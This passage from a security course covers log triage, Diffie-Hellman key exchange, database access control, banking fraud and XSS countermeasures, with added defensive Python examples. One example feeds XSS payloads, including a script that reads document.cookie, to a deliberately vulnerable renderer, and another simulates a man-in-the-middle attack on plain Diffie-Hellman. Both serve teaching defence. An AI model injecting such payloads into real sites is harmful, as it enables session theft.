are generated varies from an appliance to a workstation. Most anti-virus programs also create logs when they
run.
Those files should also be checked regularly by whoever manages the logs, who will want to verify not only
that the programs ran but also that their definition files are current. The filters deployed on the logs are
targeted at the following activities:
- Reporting: Reports are the one item present in every workplace. Every department uses the reports it
generates as a dashboard for the action it wants to take, and the security and IT departments are no
different. To analyse security information or share it with others, an organization mainly needs to
focus on three key areas: alarms, alerts, and trends. These are discussed next

- Alarms: Alarms are indications of a problem going on right now; think of a siren sounding when
someone kicks in the door of a home. These are conditions that an organization must respond to
immediately. Alarm rates can also indicate trends: after the organization solves the problem, it
should look for indications that the condition is not isolated
- Alerts: Slightly below alarms are alerts; these are issues that an organization needs to pay attention
to but that are not bringing the system to its knees at this very moment (think of them as tornado
watches rather than tornado warnings). In Event Viewer, for example, system events are identified as
errors, warnings, or information. Errors are the most critical, but the others need attention as well to
keep them from eventually becoming errors
- Trends: Trends indicate where problems are recurring. By focusing on trends, an organization can
identify weaknesses in its systems and the areas where it needs to devote more resources to head off
future problems
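The alarm, alert and trend triage described above, as an added Python example that is not part of the course material, run over constructed log lines in a simplified Windows Security log layout. The event IDs are the real Windows ones (4624 logon success, 4625 logon failure, 4719 audit policy changed, 1102 audit log cleared); the line format, the thresholds and the sample data are assumptions of the example.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed log lines: "timestamp event_id outcome key=value ...". Event IDs follow the
# Windows Security log: 4624 logon success, 4625 logon failure, 4719 audit policy changed,
# 1102 audit log cleared. The data below is made up for the example.
SAMPLE_LOG = """\
2015-03-02T08:58:10 4625 AuditFailure user=jsmith src=10.0.0.41
2015-03-02T09:14:05 4625 AuditFailure user=admin src=10.0.0.77
2015-03-02T09:14:07 4625 AuditFailure user=admin src=10.0.0.77
2015-03-02T09:14:09 4625 AuditFailure user=admin src=10.0.0.77
2015-03-02T09:14:11 4625 AuditFailure user=admin src=10.0.0.77
2015-03-02T09:14:13 4625 AuditFailure user=admin src=10.0.0.77
2015-03-02T09:14:20 4624 AuditSuccess user=admin src=10.0.0.77
2015-03-02T09:40:00 4719 AuditSuccess user=admin src=10.0.0.77
2015-03-02T10:02:33 4625 AuditFailure user=mlee src=10.0.0.12
2015-03-02T10:55:01 1102 AuditSuccess user=admin src=10.0.0.77
"""

ALARM_FAILURES = 5                     # this many failed logons from one source ...
ALARM_WINDOW = timedelta(minutes=2)    # ... inside this window is an active brute force
ALERT_EVENTS = {4719: "audit policy changed", 1102: "audit log cleared"}


def parse(log_text):
    """Turn the constructed text format into a list of record dicts."""
    records = []
    for line in log_text.splitlines():
        ts, event_id, outcome, *kv = line.split()
        fields = dict(item.split("=", 1) for item in kv)
        records.append({"ts": datetime.fromisoformat(ts), "id": int(event_id),
                        "outcome": outcome, **fields})
    return records


def triage(records):
    """Sort records into alarms (act now), alerts (look soon) and a trend table."""
    alarms, alerts = [], []
    failures = defaultdict(list)        # src -> timestamps of recent 4625 events
    fired = set()                       # sources that already raised a brute-force alarm
    for r in records:
        if r["id"] == 4625:
            window = failures[r["src"]]
            window.append(r["ts"])
            window[:] = [t for t in window if r["ts"] - t <= ALARM_WINDOW]
            if len(window) >= ALARM_FAILURES and r["src"] not in fired:
                fired.add(r["src"])
                alarms.append(f"{r['ts'].isoformat()} brute force against {r['user']} from {r['src']}")
        elif r["id"] == 4624 and r["src"] in fired:
            # a success right after a burst of failures is the worst case: the guess worked
            alarms.append(f"{r['ts'].isoformat()} logon success from {r['src']} after brute force")
        if r["id"] in ALERT_EVENTS:
            alerts.append(f"{r['ts'].isoformat()} {ALERT_EVENTS[r['id']]} by {r['user']}")
    # Trend: failed logons per hour, showing where to devote resources
    trend = Counter(r["ts"].strftime("%H:00") for r in records if r["id"] == 4625)
    return {"alarms": alarms, "alerts": alerts, "trend": dict(sorted(trend.items()))}


def report(log_text=SAMPLE_LOG):
    return triage(parse(log_text))


if __name__ == "__main__":
    for section, items in report().items():
        print(section.upper(), items)
```

Note that event 1102 (log cleared) is treated as an alert rather than routine housekeeping: the weekly manual clearing recommended above should be the only source of that event, so an unexpected one is worth a look.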


Countermeasures (10 of 55)

• Cryptography Countermeasures
– Defense against key management attacks: Cryptography offers well-accepted and widely used
algorithms for confidentiality, authentication and integrity

• The basic feature a cryptographic system relies on is an efficient, secure and robust key
management system

• The secret input to a cryptographic algorithm is called the key

• If the key is compromised, the protected information is exposed

• Hosts protect stored keys by wrapping them under a Key Encryption Key (KEK)

• The Diffie-Hellman (DH) scheme allows a session key to be generated at both ends when public
values are exchanged between two communicating parties


Figure 3-20. Countermeasures (10 of 55) DS011.0

Notes:
Defense against key management attacks: Cryptography offers well-accepted and widely used algorithms for
confidentiality, authentication and integrity. The basic feature a cryptographic system relies on is an
efficient, secure and robust key management system. Key management is an essential part of any secure
communication, yet it is where protocol design and system security most often fail. The secret input to a
cryptographic algorithm is called the key.
The key is what unlocks the encrypted information, so if the key is compromised the protected information is
exposed. It is therefore essential to keep symmetric keys and private keys secret. Hosts protect keys stored
locally by wrapping them under a Key Encryption Key (KEK), so that working keys never sit on disk in the
clear; the KEK itself must then be guarded, for instance in a hardware module or derived from a passphrase.
Keys must still reach the other party, and the insecure channel used for key agreement and key distribution
is where the risk is highest. One approach encrypts a session key generated on the sender's side under the
recipient's public key and delivers it; this is the traditional digital envelope. The Diffie-Hellman (DH) scheme
instead lets a session key be generated at both ends when public values are exchanged between the two
parties, so the key itself is never transmitted. Plain DH does not authenticate either party, which is exactly
what a man-in-the-middle exploits; this has driven the development of several authenticated DH variants.
The symmetric approach prevents a replay attack during session-key setup by including a sequence number
or a nonce in the exchange. Needham-Schroeder, a multi-message key distribution protocol built around a
trusted server, is also used and has served as the basis for other authentication protocols such as Kerberos
(a Needham-Schroeder variant), which is used in Windows and many other production systems.
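The Diffie-Hellman exchange, the man-in-the-middle attack on it, and one of the "enhanced" schemes mentioned above (a pre-shared key authenticating the transcript with HMAC), as an added Python example that is not part of the course material. The group parameters (p = 2**127 - 1, g = 3) are a deliberately small toy choice that keeps the example self-contained and are not secure; production code uses a standardized group or X25519. The party names and the pre-shared authentication key are assumptions of the example.

```python
import hashlib
import hmac
import secrets

# Toy group. p = 2**127 - 1 is prime, but 127 bits is far too small and it is not a safe
# prime, so this is NOT secure; it only keeps the example self-contained. Production code
# uses a standardized group (RFC 3526 group 14 or larger) or elliptic-curve DH such as X25519.
P = 2**127 - 1
G = 3


def kdf(shared_secret):
    """Never use the raw DH value as a key; derive the session key from it."""
    return hashlib.sha256(shared_secret.to_bytes(16, "big")).digest()


class Party:
    def __init__(self, name):
        self.name = name
        self.private = secrets.randbelow(P - 2) + 1    # exponent a in [1, p-2], kept secret
        self.public = pow(G, self.private, P)          # g^a mod p, sent in the clear
        self.session_key = None

    def derive(self, peer_public):
        """Compute (g^b)^a mod p from whatever arrived claiming to be the peer's value."""
        self.session_key = kdf(pow(peer_public, self.private, P))
        return self.session_key


def transcript_tag(auth_key, own_public, received_public):
    """HMAC over (what I sent, what I received); the peer recomputes it from its own view."""
    data = own_public.to_bytes(16, "big") + received_public.to_bytes(16, "big")
    return hmac.new(auth_key, data, hashlib.sha256).digest()


def honest_exchange():
    """Alice -> Bob: g^a ; Bob -> Alice: g^b. Both ends derive the same key."""
    alice, bob = Party("alice"), Party("bob")
    return alice.derive(bob.public) == bob.derive(alice.public)


def mitm_exchange():
    """Mallory swaps in her own g^m in both directions and ends up with a key to each victim."""
    alice, bob, mallory = Party("alice"), Party("bob"), Party("mallory")
    alice.derive(mallory.public)       # Alice believes g^m came from Bob
    bob.derive(mallory.public)         # Bob believes g^m came from Alice
    key_with_alice = kdf(pow(alice.public, mallory.private, P))
    key_with_bob = kdf(pow(bob.public, mallory.private, P))
    # Plain DH gives the victims nothing to check, so the substitution goes unnoticed.
    return alice.session_key == key_with_alice and bob.session_key == key_with_bob


def authenticated_exchange(attacker_present):
    """A pre-shared MAC key authenticates the transcript, so substitution is detected."""
    auth_key = secrets.token_bytes(32)                # known to Alice and Bob only
    alice, bob, mallory = Party("alice"), Party("bob"), Party("mallory")
    a_seen_by_bob = mallory.public if attacker_present else alice.public
    b_seen_by_alice = mallory.public if attacker_present else bob.public
    # Each side MACs (own value, received value). Mallory can relay tags but not forge them.
    tag_from_alice = transcript_tag(auth_key, alice.public, b_seen_by_alice)
    tag_from_bob = transcript_tag(auth_key, bob.public, a_seen_by_bob)
    alice_ok = hmac.compare_digest(tag_from_bob, transcript_tag(auth_key, b_seen_by_alice, alice.public))
    bob_ok = hmac.compare_digest(tag_from_alice, transcript_tag(auth_key, a_seen_by_bob, bob.public))
    if not (alice_ok and bob_ok):
        return False                                   # abort: the transcript was tampered with
    return alice.derive(b_seen_by_alice) == bob.derive(a_seen_by_bob)


if __name__ == "__main__":
    print("plain DH agrees:", honest_exchange())
    print("plain DH, MITM succeeds:", mitm_exchange())
    print("authenticated DH, no attacker:", authenticated_exchange(False))
    print("authenticated DH, attacker detected:", not authenticated_exchange(True))
```

The pre-shared MAC key stands in for whatever long-term credential the deployment has (a password-derived key, a certificate-signed transcript in TLS, the Kerberos ticket key); the lesson is the same in each case: DH supplies secrecy of the agreed key, and something else must supply the authentication.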

Advanced attacks on keys threaten key integrity and ownership. Data authentication and integrity can be
ensured by using a Hashed Message Authentication Code (HMAC), a message digest, or a digital signature. In
a public-key certificate, the public key is secured by binding it to the owner's identity; in a PKI this binding is
made by the Certification Authority (CA).
Where a system has no trusted third party (TTP), the public-key certificate is vouched for by peer nodes in a
distributed manner; the Pretty Good Privacy (PGP) web of trust is an example. Some distributed approaches
use threshold cryptography, in which a subset or all of the network hosts each hold a share of the system
secret. A certificate can prove the ownership of a key, but it cannot prove whether the owner is "good" or
"bad"; its main purpose is key authentication.
A key must not be used indefinitely: after a period of use the risk that it has been disclosed grows, and once
disclosed it can no longer serve any purpose. Mechanisms are therefore required to retire keys and to
announce that a key is no longer valid. PKI offers this implicitly, through the validity period in the certificate,
and explicitly: if a private key may have been compromised during the validity period, the Certification
Authority (CA) revokes the certificate and informs the network by listing it in the certificate revocation list
(CRL) so that it is no longer used. Relying parties that do not check the CRL will keep trusting a revoked key
until its certificate expires.


Countermeasures (11 of 55)

• Database Security Countermeasures

– Preventing Database Communication Protocol Attacks: Protocol validation is a technology that
helps defeat database communication protocol attacks

• Blocking actions or alerts are generated when live traffic does not match the expected protocol
structure

– Preventing Backup Data Exposure: Encryption of database backups is also necessary, and vendors
have suggested it

• Key management overhead and performance cost are drawbacks, and encryption is a poor substitute
for the privilege controls described in this section


Figure 3-21. Countermeasures (11 of 55) DS011.0

Notes:
Database Security
Preventing Database Communication Protocol Attacks: Protocol validation is a technology that helps defeat
database communication protocol attacks. It parses the database traffic and compares it with the expected
protocol structure, generating blocking actions or alerts when the live traffic does not match the expectation.
Protecting and auditing against protocol threats is thus accomplished by comparing the live communication
protocol against known-good protocol structures; a malformed packet crafted to exploit a flaw in the
database's own protocol parser is rejected before the database ever sees it.
Imperva's Database Communication Protocol Validation is one implementation of this capability. Derived
from the ongoing research of the Imperva Application Defense Center (ADC), it was built to address database
communication protocols and their vulnerabilities. Application and database vendors such as Microsoft and
Oracle have credited the ADC with discovering and helping to mitigate several serious vulnerabilities, which
has led to a substantially higher level of product security.
Preventing Backup Data Exposure: Encryption of database backups is also necessary, and vendors have
suggested that DBMS products should not be able to create backups that are unencrypted. When the popular
suggestion of encrypting the online (live) database is made, cryptographic key management and performance
cost stand out as drawbacks, and such encryption is a poor substitute for the privilege controls described in
this section: a privileged user who can query the data sees it decrypted regardless.

Countermeasures (12 of 55)

• Database Security Countermeasures


– Preventing Authentication Attacks
• Strong Authentication

• Directory Integration

• Authentication Protections

• High Performance

• Separation of Duties

• Cross-Platform Auditing


Figure 3-22. Countermeasures (12 of 55) DS011.0

Notes:
Preventing Authentication Attacks:
Strong Authentication: There must be a process that implements the strongest authentication technologies
that are practically possible. Two-factor authentication is considered good authentication; however, it has
often been seen as impractical because it is costly and difficult to use. A strong password and user-name
policy must also be in place, as it serves as a strong way to authenticate a user.
Directory Integration: The enterprise directory infrastructure must be used together with a strong
authentication mechanism in order to make authentication easy to use and scalable. Directory integration
lets users authenticate with the credentials they already use to log in, which makes the authentication
technology easy to adopt.
Authentication Protections: Breakdowns happen in spite of all the effort put into a strong authentication
process. There are many reasons why this happens, among them:
- The policies intended to make passwords stronger are ignored
- An attacker gets lucky with a brute-force or password-guessing attack
- A weaker authentication scheme has to be retained for practical reasons
Many online and offline tools are available that overcome the above difficulties and prevent the attacks
associated with authentication, for example by detecting repeated failed logins and locking or throttling the
account

High Performance: Network-based appliances operate at line speed with no impact on database performance.
These appliances are built for audit purposes; offloading the audit processing to them can be expected to
improve the performance of the organization's database.
Separation of Duties: Network-based audit appliances operate independently of the database server, which
makes it easy to separate the duties of database administrators from those of auditors appropriately. Because
they work independently of the server, these devices are also not exposed to privilege-elevation attacks on
the database itself.
Cross-Platform Auditing: Network-based audit appliances enable centralized audit operations and uniform
standards across database platforms. These two factors alone reduce database server costs, load-balancing
requirements and other administration costs.

Countermeasures (13 of 55)

• Database Security Countermeasures


– Preventing Platform Attacks: The necessary protection is achieved by a combination of Intrusion
Prevention Systems (IPS) and regular software updates (patches)

• The vulnerabilities present in the database can be eliminated using the vendor-provided updates

• IPS addresses these problems, identifies attacks, as well as inspects traffic as mentioned before


Figure 3-23. Countermeasures (13 of 55) DS011.0

Notes:
Preventing Platform Attacks: Database assets are often threatened by attacks on the underlying platform
(the operating system and the database software itself). The necessary protection is achieved by a
combination of Intrusion Prevention Systems (IPS) and regular software updates (patches). Vendor-provided
updates eliminate known vulnerabilities in the database, but the system remains vulnerable between the
periodic cycles in which enterprises test and implement updates, and compatibility problems can lengthen
that window. An IPS addresses this gap: it inspects traffic and identifies attacks against known
vulnerabilities, as described earlier, so that an unpatched flaw is shielded until the patch is applied.


Countermeasures (14 of 55)

• Database Security Countermeasures


– Preventing Excessive Privilege Abuse: Database privileges should be limited to the minimum required,
enforced at the level of individual SQL operations

– Access Control

– Flow Control

– Encryption

– RAID

– Authentication


Figure 3-24. Countermeasures (14 of 55) DS011.0

Notes:
Preventing Excessive Privilege Abuse: Database privileges should be limited to the minimum required and
enforced at the level of individual SQL operations; this is the mechanism that helps against excessive
privileges. The access control reaches down to the exact rows and columns involved. Thus, if a university
administrator updates a student's contact information, the access control mechanism allows it; if the same
administrator attempts to alter grades, the mechanism blocks the statement and issues an alert.
Query-level access control shows its significance in detecting excessive privilege abuse by malicious
employees, and most of the top ten database threats can be prevented with it. Most database software
implements some degree of query-based access control, but except in the most limited deployments these
native controls prove impractical. Defining query-level access policies is time-consuming, and the policies
must be updated to reflect new roles every time user roles change (which they are bound to do over time).
Since it is a back-breaking process for database administrators to define query policies for hundreds of users,
most organizations instead grant users a generic, excessive set of access privileges. Real query-level access
control becomes possible with the help of automated tools. The controls involved in preventing excessive
privilege abuse are:

Access Control: An organization's database contains a great deal of information and usually has several
users, most of whom need to access only a small part of it. A policy defines the requirements that are to be
implemented within hardware and software, and those that are external to the system, including physical,
personnel, and procedural controls.
Flow Control: Flow control regulates the flow of information among accessible objects. Flow controls check
that information contained in objects does not flow, explicitly or implicitly, into less protected objects.
Encryption: An encryption algorithm is applied to the data using a user-specified encryption key; the output
is the encrypted version. A matching decryption algorithm takes the encrypted data and the decryption key
as input and returns the original data.
RAID: A Redundant Array of Independent Disks protects against data loss due to disk failure. It is an
availability control, not a confidentiality one.
Authentication: Access to the database is a matter of authentication, which governs how the database is
accessed. Every access should be monitored.
Backup: Backups should be taken regularly so that in the event of a disaster the organization can recover
its data. A backup holds the same sensitive data as the live database and needs the same protection.
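The query-level access control described above (the registrar may change contact details but not grades, and a denied statement raises an alert), as an added Python example that is not part of the course material. It uses the statement authorizer of the standard-library sqlite3 module, which is consulted for every table and column a statement touches before the statement is prepared. The POLICY table, the role names and the students schema are assumptions of the example.

```python
import sqlite3

# Constructed policy: for each role, which (table, column) pairs may be read and written.
# "*" grants every column of the table. Anything not listed is denied and raises an alert.
POLICY = {
    "registrar_admin": {
        "read": {("students", "*")},
        "write": {("students", "email"), ("students", "phone")},
    },
    "grader": {
        "read": {("students", "id"), ("students", "name"), ("students", "grade")},
        "write": {("students", "grade")},
    },
}

ACTION_NAMES = {
    sqlite3.SQLITE_READ: "READ",
    sqlite3.SQLITE_UPDATE: "UPDATE",
    sqlite3.SQLITE_INSERT: "INSERT",
    sqlite3.SQLITE_DELETE: "DELETE",
}
# Statement-level actions that carry no table or column and are always needed.
HARMLESS = {sqlite3.SQLITE_SELECT, sqlite3.SQLITE_TRANSACTION}


class QueryLevelGuard:
    """Installs an authorizer that checks every column touched by every statement."""

    def __init__(self, conn, role):
        self.role = role
        self.alerts = []
        conn.set_authorizer(self._authorize)

    def _permitted(self, kind, table, column):
        grants = POLICY[self.role][kind]
        return (table, column) in grants or (table, "*") in grants

    def _authorize(self, action, table, column, db_name, trigger):
        if action in HARMLESS:
            return sqlite3.SQLITE_OK
        if action == sqlite3.SQLITE_READ:
            ok = self._permitted("read", table, column)
        elif action == sqlite3.SQLITE_UPDATE:
            ok = self._permitted("write", table, column)
        elif action in (sqlite3.SQLITE_INSERT, sqlite3.SQLITE_DELETE):
            ok = self._permitted("write", table, "*")   # whole-row writes need a table grant
        else:
            ok = False   # DDL, PRAGMA, ATTACH and the like are never allowed to application roles
        if not ok:
            self.alerts.append(f"DENY role={self.role} {ACTION_NAMES.get(action, action)} {table}.{column}")
            return sqlite3.SQLITE_DENY
        return sqlite3.SQLITE_OK


def attempt(conn, sql, params=()):
    """Run one statement; False means the authorizer refused to even prepare it."""
    try:
        conn.execute(sql, params)
        conn.commit()
        return True
    except sqlite3.DatabaseError:   # surfaces as "not authorized"
        return False


def demo():
    # The authorizer runs only when a statement is prepared, so a statement cached while a
    # more privileged role was active would bypass it: disable the statement cache.
    conn = sqlite3.connect(":memory:", cached_statements=0)
    conn.execute("CREATE TABLE students (id INTEGER PRIMARY KEY, name TEXT, email TEXT, phone TEXT, grade TEXT)")
    conn.execute("INSERT INTO students VALUES (1, 'Ada', 'ada@example.edu', '555-0100', 'B')")
    conn.commit()

    results = {}
    registrar = QueryLevelGuard(conn, "registrar_admin")
    results["registrar_updates_email"] = attempt(conn, "UPDATE students SET email = ? WHERE id = ?", ("ada@example.org", 1))
    results["registrar_updates_grade"] = attempt(conn, "UPDATE students SET grade = ? WHERE id = ?", ("A", 1))
    results["registrar_drops_table"] = attempt(conn, "DROP TABLE students")

    grader = QueryLevelGuard(conn, "grader")
    results["grader_updates_grade"] = attempt(conn, "UPDATE students SET grade = ? WHERE id = ?", ("A", 1))
    results["grader_reads_email"] = attempt(conn, "SELECT email FROM students WHERE id = ?", (1,))
    results["alerts"] = registrar.alerts + grader.alerts
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The point the text makes about maintenance shows up here too: every new role or column means another POLICY entry, which is why native query-level controls are so often left unused in favour of blanket grants.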


Countermeasures (15 of 55)

• Banking Frauds Countermeasures


– Universal Payment Identification Code (UPIC)

– ACH Block (Automated Clearing House)

– Fraud Detection Software/tools


Figure 3-25. Countermeasures (15 of 55) DS011.0

Notes:
Banking Frauds
Universal Payment Identification Code (UPIC): The Electronic Payments Network (EPN) developed a unique
account identifier issued by a financial institution. This identifier, known as a UPIC, allows merchants to do
e-business and receive electronic payments while their confidential bank account details remain secure and
undisclosed.
ACH Block (Automated Clearing House): If a merchant account is not authorized for ACH transactions, an
ACH block prevents any ACH activity on it. Alternatively, the merchant can receive alerts from the bank about
ACH transactions that do not meet predefined conditions and then decide whether to accept or decline each
one. This lets the merchant stop e-fraud before it happens.
Fraud Detection Software/tools: An organization involved in e-business detects fraud and reduces its fraud
rate by installing fraud detection tools. The results of the software help the merchant decide whether to
accept, reject, or review an ongoing transaction. Fraud detection tools fall into the categories of proprietary
data, multi-merchant data, purchase device tracing, and validation services. Risk Management Modules
(Fraud Screens), Card Verification Code (CVC) and Address Verification Service (AVS) are tools used by
56% of merchants, according to CyberSource (2012).

Countermeasures (16 of 55)

• Banking Frauds Countermeasures (Contd.)


– IP Address Locator

– Credit Card Number Hacking Attack Countermeasures

– Skimming Attack Countermeasures


Figure 3-26. Countermeasures (16 of 55) DS011.0

Notes:
IP Address Locator: Using an IP address locator, the merchant can place the origin of an order on a map,
approximately to the city and state, and compute the distance between the location of the person entering
the order and the billing address of the online buyer. A large distance is not proof that the visitor is using a
proxy, so when the distance is large the merchant should apply additional authentication measures to the
transaction and allow, reject or review it accordingly. Users who hide their IP address behind anonymous
proxy servers (published lists of anonymous proxy servers can be used to detect this) should also be
checked.
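As an added example (not from the course notes, and not any vendor's product), the following Python fraud screen combines the signals described in these notes: the AVS and CVC results from the fraud detection paragraph, a list of anonymous proxy ranges, and the distance between the order's IP geolocation and the billing address. The geolocation table, the proxy list, the scoring weights and the distance threshold are constructed assumptions for illustration; a real deployment would query a commercial IP geolocation database.

```python
"""Added example (not part of the course): an order fraud screen built from
AVS/CVC results, an anonymous-proxy list and IP-to-billing-address distance.
GEO_TABLE and ANON_PROXIES are constructed sample data (assumption: a real
deployment queries a commercial IP geolocation database)."""
import ipaddress
import math

# Constructed sample IP-to-location table: network -> (city, latitude, longitude)
GEO_TABLE = {
    ipaddress.ip_network("203.0.113.0/24"): ("Austin, TX", 30.27, -97.74),
    ipaddress.ip_network("198.51.100.0/24"): ("Seattle, WA", 47.61, -122.33),
    ipaddress.ip_network("192.0.2.0/24"): ("Bucharest, RO", 44.43, 26.10),
}
# Constructed list of ranges known to host anonymous proxy servers
ANON_PROXIES = [ipaddress.ip_network("192.0.2.0/24")]


def locate_ip(ip: str):
    """Approximate city and coordinates for an IP, or None if unknown."""
    addr = ipaddress.ip_address(ip)
    for net, loc in GEO_TABLE.items():
        if addr in net:
            return loc
    return None


def haversine_km(lat1, lon1, lat2, lon2) -> float:
    """Great-circle distance in kilometres between two latitude/longitude points."""
    earth_radius_km = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * earth_radius_km * math.asin(math.sqrt(a))


def screen_order(order: dict, distance_threshold_km: float = 500.0):
    """Score an order and return ('accept' | 'review' | 'reject', reasons).

    order keys: ip, avs ('Y' = full match), cvc ('M' = match), bill_lat, bill_lon.
    Weights and thresholds are illustrative assumptions, not industry values.
    """
    reasons, score = [], 0
    addr = ipaddress.ip_address(order["ip"])

    if any(addr in net for net in ANON_PROXIES):
        reasons.append("IP belongs to a known anonymous proxy range")
        score += 2
    if order["avs"] != "Y":
        reasons.append("AVS mismatch")
        score += 2
    if order["cvc"] != "M":
        reasons.append("CVC mismatch")
        score += 3

    loc = locate_ip(order["ip"])
    if loc is None:
        reasons.append("IP could not be located")
        score += 1
    else:
        dist = haversine_km(loc[1], loc[2], order["bill_lat"], order["bill_lon"])
        if dist > distance_threshold_km:
            # A large distance is not proof of a proxy; it only raises the review bar.
            reasons.append(f"order placed {dist:.0f} km from billing address ({loc[0]})")
            score += 2

    if score >= 5:
        return "reject", reasons
    if score >= 2:
        return "review", reasons
    return "accept", reasons


if __name__ == "__main__":
    billing_austin = {"bill_lat": 30.27, "bill_lon": -97.74}
    for ip, avs, cvc in [("203.0.113.5", "Y", "M"), ("198.51.100.1", "Y", "M"),
                         ("192.0.2.9", "N", "M")]:
        print(ip, screen_order({"ip": ip, "avs": avs, "cvc": cvc, **billing_austin}))
```

The three constructed orders all bill to Austin: the first is placed from an Austin address and is accepted, the second from Seattle (about 2,850 km away) is sent for manual review, and the third comes through a known anonymous proxy range with an AVS mismatch and is rejected.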
Credit Card Number Hacking Attack Countermeasures: Using temporary (virtual) numbers when shopping is
an effective way to keep a real credit card number from being compromised while it is stored by a merchant.
ShopSafe, a program from MBNA, gave customers a secure website on which they could generate a new card
number with a specific credit limit and expiration date for each purchase.
If a customer wants to spend $150, a unique card number is created with a credit limit of $150. Once the
number has been given to the merchant and charged, it is no longer valid, so it does not matter whether the
merchant stores it or it is compromised later. Citibank's Virtual Account Numbers program and Discover's
Deskshop virtual credit card are similar services offered by other card issuers.
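To make the single-use number mechanism concrete, here is an added toy issuer in Python; it is not the course's code and not how ShopSafe, Citibank or Discover implement their services. It generates a Luhn-valid card number tied to a spending limit, approves exactly one authorization at or below that limit, and declines everything afterwards, so a number captured from a merchant's database is worthless. The BIN prefix, the random source and the authorization rules are assumptions for the demo.

```python
"""Added example (not the course's or any issuer's code): a toy issuer that
generates single-use virtual card numbers tied to a spending limit, so a
stored or stolen number is worthless after its one authorization.  The BIN,
the random source and the authorization rules are assumptions."""
import secrets


def luhn_check_digit(partial: str) -> str:
    """Compute the Luhn check digit for a partial PAN (digits only)."""
    total = 0
    # The rightmost digit of `partial` gets doubled because the check digit
    # will be appended after it.
    for i, ch in enumerate(reversed(partial)):
        d = int(ch)
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(pan: str) -> bool:
    """True if the PAN's last digit is the correct Luhn check digit."""
    return pan.isdigit() and len(pan) > 1 and luhn_check_digit(pan[:-1]) == pan[-1]


class VirtualCardIssuer:
    BIN = "999999"   # constructed test prefix, not a real issuer identifier

    def __init__(self):
        # pan -> {"limit": cents, "used": bool, "real": underlying account}
        self._cards = {}

    def issue(self, real_account: str, limit_cents: int) -> str:
        """Create a fresh single-use PAN with a specific spending limit."""
        partial = self.BIN + "".join(secrets.choice("0123456789") for _ in range(9))
        pan = partial + luhn_check_digit(partial)
        self._cards[pan] = {"limit": limit_cents, "used": False, "real": real_account}
        return pan

    def authorize(self, pan: str, amount_cents: int) -> str:
        """Approve once, at or below the limit; anything else is declined."""
        card = self._cards.get(pan)
        if card is None or not luhn_valid(pan):
            return "declined: unknown number"
        if card["used"]:
            return "declined: number already used"
        if amount_cents > card["limit"]:
            return "declined: over limit"
        card["used"] = True   # burn the number after its single use
        return f"approved on account {card['real']}"


if __name__ == "__main__":
    issuer = VirtualCardIssuer()
    pan = issuer.issue("acct-42", 15000)          # $150.00 limit
    print(pan, issuer.authorize(pan, 15000))       # approved
    print(pan, issuer.authorize(pan, 100))         # declined: already used
```

The point the demo makes is in `authorize`: the merchant receives a number that looks and validates like any other card number, but the issuer's own record of it is what enforces the one-shot, capped behaviour.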


Skimming Attack Countermeasures: When paying in a restaurant, do not simply hand the card to a waiter and
let it out of sight; keep an eye on the card while it is being used to make the payment. The best arrangement
is a card terminal within sight of the cardholder, so that the user can see what is being done with the card.
Skimmer devices are very small (the size of a pager), are easily concealed, and need only a few seconds to
swipe the card. At places such as restaurants, gas stations and convenience stores, use ATMs that belong to
well-known banks.


Countermeasures (17 of 55) IBM ICE (Innovation Centre for Education)



• Web Application Countermeasures


– Cross-Site Scripting (XSS) Countermeasures: Countermeasures for stopping cross-site scripting are
given below:
• Check and validate all input fields

• Need of security policy

• Need of security review

• Implementation and use of different tools

• Filtration of the output script

• Comparison of the generated code


Figure 3-27. Countermeasures (17 of 55) DS011.0

Notes:
Cross-Site Scripting (XSS) Countermeasures: Countermeasures for stopping cross-site scripting are given
below:
- All hidden fields, cookies, parameters, query strings and form fields must be checked and validated
against a specification fixed by the authorizing body
- A stringent, positive (allow-list based) and practical security policy must be implemented: it permits
what the specification allows and blocks everything else
- A security review of the code must be performed, covering every place where input can originate from
the HTTP request
- Tools such as Nikto and Nessus should be used to scan the organization's websites; they help find
some of the vulnerabilities
- To defeat XSS vulnerabilities, script output must be filtered (encoded) before it is sent; this prevents
the injected script from being transmitted to the users' machines
- The generated code must be compared against the specifications set by the higher authority
- Input fields should have a reasonable maximum number of allowed characters; most script attacks
need many characters to operate
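The two countermeasures that matter most in code are validating input against a positive specification and encoding output at the point where it enters HTML. The Python below is an added example, not the course's code: it shows a vulnerable renderer beside a safe one, the difference between element-content and attribute-context encoding, and a length and character limit on input. The field rules, template and payload are constructed for illustration.

```python
"""Added example (not the course's code): input limits plus output encoding
against cross-site scripting.  Field rules, template and payload are
constructed for illustration."""
import html
import re

MAX_LEN = {"name": 40, "comment": 500}          # reasonable maximum sizes per field
NAME_RE = re.compile(r"^[A-Za-z0-9 .'-]+$")     # positive (allow-list) policy for a name


def validate(field: str, value: str) -> str:
    """Reject input that does not fit the specification for the field."""
    if field not in MAX_LEN:
        raise ValueError(f"{field}: unknown field")
    if len(value) > MAX_LEN[field]:
        raise ValueError(f"{field}: exceeds {MAX_LEN[field]} characters")
    if field == "name" and not NAME_RE.fullmatch(value):
        raise ValueError("name: contains characters outside the allowed set")
    return value


def is_rejected(field: str, value: str) -> bool:
    """True if validate() refuses the value."""
    try:
        validate(field, value)
        return False
    except ValueError:
        return True


def render_vulnerable(name: str, comment: str) -> str:
    """Raw interpolation: the browser executes whatever the user supplied."""
    return f"<p><b>{name}</b>: {comment}</p>"


def render_safe(name: str, comment: str) -> str:
    """Encode at the output point, where the data enters HTML element content."""
    return f"<p><b>{html.escape(name)}</b>: {html.escape(comment)}</p>"


def render_attr_safe(value: str) -> str:
    """Attribute context: quotes must be encoded too (html.escape does so by default)."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def handle_comment(name: str, comment: str) -> str:
    """Validate on input, encode on output; raises ValueError on bad input."""
    return render_safe(validate("name", name), validate("comment", comment))


if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"
    print(render_vulnerable("guest", payload))
    print(render_safe("guest", payload))
    print(render_attr_safe('" onmouseover="alert(1)'))
```

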